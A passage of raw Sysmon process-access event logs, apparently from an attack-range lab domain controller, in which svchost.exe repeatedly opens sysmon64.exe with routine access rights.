C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.253","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3289,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.253\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.253","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3290,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.253\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.253","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3291,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.253\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.253","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3292,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.253\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.253","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3293,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.253\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.253","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3294,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.253\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.253","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3295,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.253\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.253","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3296,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.253\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 